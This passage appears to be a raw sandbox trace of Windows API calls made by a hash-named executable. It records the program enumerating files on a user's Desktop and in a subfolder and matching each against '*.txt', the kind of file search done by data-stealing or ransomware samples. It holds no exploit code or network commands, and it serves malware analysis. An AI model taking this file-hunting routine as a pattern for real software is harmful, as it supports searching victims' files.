CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.623] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.624] PathMatchSpecW (pszFile="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", pszSpec="*.txt") returned 0 [0110.624] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a6690 | out: hHeap=0x29a0000) returned 1 [0110.624] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c000a40, ftCreationTime.dwHighDateTime=0x1d7a7d8, ftLastAccessTime.dwLowDateTime=0x841601c0, ftLastAccessTime.dwHighDateTime=0x1d7aabb, ftLastWriteTime.dwLowDateTime=0x841601c0, ftLastWriteTime.dwHighDateTime=0x1d7aabb, nFileSizeHigh=0x0, nFileSizeLow=0x1414, dwReserved0=0x0, dwReserved1=0x0, cFileName="fmnAnasf2I.mp4", cAlternateFileName="FMNANA~1.MP4")) returned 1 [0110.624] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.624] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.624] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4" [0110.624] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.624] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.624] lstrcatW (in: lpString1="\\", lpString2="fmnAnasf2I.mp4" | out: lpString1="\\fmnAnasf2I.mp4") returned="\\fmnAnasf2I.mp4" [0110.624] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0110.624] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2e) returned 0x29a0550 [0110.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", cchWideChar=46, lpMultiByteStr=0x29a0550, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\fmnAnasf2I.mp4", lpUsedDefaultChar=0x0) returned 46 [0110.624] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.624] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.624] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.624] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.624] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.624] PathMatchSpecW (pszFile="fmnAnasf2I.mp4", pszSpec="*.txt") returned 0 [0110.624] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.624] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb8f0a80, ftCreationTime.dwHighDateTime=0x1d7adf4, ftLastAccessTime.dwLowDateTime=0xc336cc10, ftLastAccessTime.dwHighDateTime=0x1d7ae1a, ftLastWriteTime.dwLowDateTime=0xc336cc10, ftLastWriteTime.dwHighDateTime=0x1d7ae1a, nFileSizeHigh=0x0, nFileSizeLow=0x187f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="g3fX8Y8-txe9_Es.m4a", cAlternateFileName="G3FX8Y~1.M4A")) returned 1 [0110.624] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.624] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.624] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a" [0110.624] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.624] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.624] lstrcatW (in: lpString1="\\", lpString2="g3fX8Y8-txe9_Es.m4a" | out: lpString1="\\g3fX8Y8-txe9_Es.m4a") returned="\\g3fX8Y8-txe9_Es.m4a" [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x70) returned 0x29a04e8 [0110.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x33) returned 0x29a0560 [0110.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", cchWideChar=51, lpMultiByteStr=0x29a0560, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\g3fX8Y8-txe9_Es.m4a", lpUsedDefaultChar=0x0) returned 51 [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x39700d0 [0110.625] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0560 | out: hHeap=0x29a0000) returned 1 [0110.625] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.625] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.625] PathMatchSpecW (pszFile="g3fX8Y8-txe9_Es.m4a", pszSpec="*.txt") returned 0 [0110.625] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.625] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2f3aea0, ftCreationTime.dwHighDateTime=0x1d7acc6, ftLastAccessTime.dwLowDateTime=0xe973a3a0, ftLastAccessTime.dwHighDateTime=0x1d7ad14, ftLastWriteTime.dwLowDateTime=0xe973a3a0, ftLastWriteTime.dwHighDateTime=0x1d7ad14, nFileSizeHigh=0x0, nFileSizeLow=0x15d9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Izq83dPIx.mp4", cAlternateFileName="IZQ83D~1.MP4")) returned 1 [0110.625] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.625] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.625] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="Izq83dPIx.mp4" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4" [0110.625] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.625] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.625] lstrcatW (in: lpString1="\\", lpString2="Izq83dPIx.mp4" | out: lpString1="\\Izq83dPIx.mp4") returned="\\Izq83dPIx.mp4" [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0110.625] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x2d) returned 0x29a0550 [0110.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", cchWideChar=45, lpMultiByteStr=0x29a0550, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\Izq83dPIx.mp4", lpUsedDefaultChar=0x0) returned 45 [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.626] PathMatchSpecW (pszFile="Izq83dPIx.mp4", pszSpec="*.txt") returned 0 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.626] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6dde030, ftCreationTime.dwHighDateTime=0x1d7a99c, ftLastAccessTime.dwLowDateTime=0x51405ab0, ftLastAccessTime.dwHighDateTime=0x1d7aeb3, ftLastWriteTime.dwLowDateTime=0x51405ab0, ftLastWriteTime.dwHighDateTime=0x1d7aeb3, nFileSizeHigh=0x0, nFileSizeLow=0x12d9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="k8k6qCAjWYmc.odt", cAlternateFileName="K8K6QC~1.ODT")) returned 1 [0110.626] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.626] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.626] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt" [0110.626] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.626] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.626] lstrcatW (in: lpString1="\\", lpString2="k8k6qCAjWYmc.odt" | out: lpString1="\\k8k6qCAjWYmc.odt") returned="\\k8k6qCAjWYmc.odt" [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x60) returned 0x29a04e8 [0110.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 48 [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x29a0550 [0110.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", cchWideChar=48, lpMultiByteStr=0x29a0550, cbMultiByte=48, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\k8k6qCAjWYmc.odt", lpUsedDefaultChar=0x0) returned 48 [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x30) returned 0x39700d0 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a0550 | out: hHeap=0x29a0000) returned 1 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.626] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970108 [0110.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=6, lpWideCharStr=0x3970108, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.626] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970108 | out: hHeap=0x29a0000) returned 1 [0110.627] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*.txt") returned 0 [0110.627] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.627] FindNextFileW (in: hFindFile=0x743860, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.627] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.627] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\" [0110.627] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\", lpString2="KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.627] lstrcpyW (in: lpString1=0x19d038, lpString2="" | out: lpString1="") returned="" [0110.627] lstrcatW (in: lpString1="", lpString2="\\" | out: lpString1="\\") returned="\\" [0110.627] lstrcatW (in: lpString1="\\", lpString2="KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.627] lstrcmpW (lpString1="KTOu", lpString2=".") returned 1 [0110.627] lstrcmpW (lpString1="KTOu", lpString2="..") returned 1 [0110.627] lstrcpyW (in: lpString1=0x19c8c0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.627] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*" [0110.627] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743920 [0110.627] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.627] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.628] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\." [0110.628] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.628] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.628] lstrcatW (in: lpString1="\\KTOu\\", lpString2="." | out: lpString1="\\KTOu\\.") returned="\\KTOu\\." [0110.628] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0110.628] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.628] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.628] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.628] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2=".." | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\..") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\.." [0110.628] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.628] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.628] lstrcatW (in: lpString1="\\KTOu\\", lpString2=".." | out: lpString1="\\KTOu\\..") returned="\\KTOu\\.." [0110.628] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0110.628] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0110.628] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.628] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.628] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\" [0110.628] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.628] lstrcpyW (in: lpString1=0x19c6b8, lpString2="\\KTOu" | out: lpString1="\\KTOu") returned="\\KTOu" [0110.628] lstrcatW (in: lpString1="\\KTOu", lpString2="\\" | out: lpString1="\\KTOu\\") returned="\\KTOu\\" [0110.628] lstrcatW (in: lpString1="\\KTOu\\", lpString2="3CEoMqDCJmINqN85E.bmp" | out: lpString1="\\KTOu\\3CEoMqDCJmINqN85E.bmp") returned="\\KTOu\\3CEoMqDCJmINqN85E.bmp" [0110.628] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a04e8 [0110.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 58 [0110.628] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x3a) returned 0x39700d0 [0110.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", cchWideChar=58, lpMultiByteStr=0x39700d0, cbMultiByte=58, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\3CEoMqDCJmINqN85E.bmp", lpUsedDefaultChar=0x0) returned 58 [0110.629] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a11c0 [0110.629] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x39700d0 | out: hHeap=0x29a0000) returned 1 [0110.629] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a04e8 | out: hHeap=0x29a0000) returned 1 [0110.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0110.629] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xc) returned 0x3970fc8 [0110.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=6, lpWideCharStr=0x3970fc8, cchWideChar=6 | out: lpWideCharStr="*.txt") returned 6 [0110.629] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970fc8 | out: hHeap=0x29a0000) returned 1 [0110.629] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*.txt") returned 0 [0110.629] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0110.629] FindNextFileW (in: hFindFile=0x743920, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.629] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") 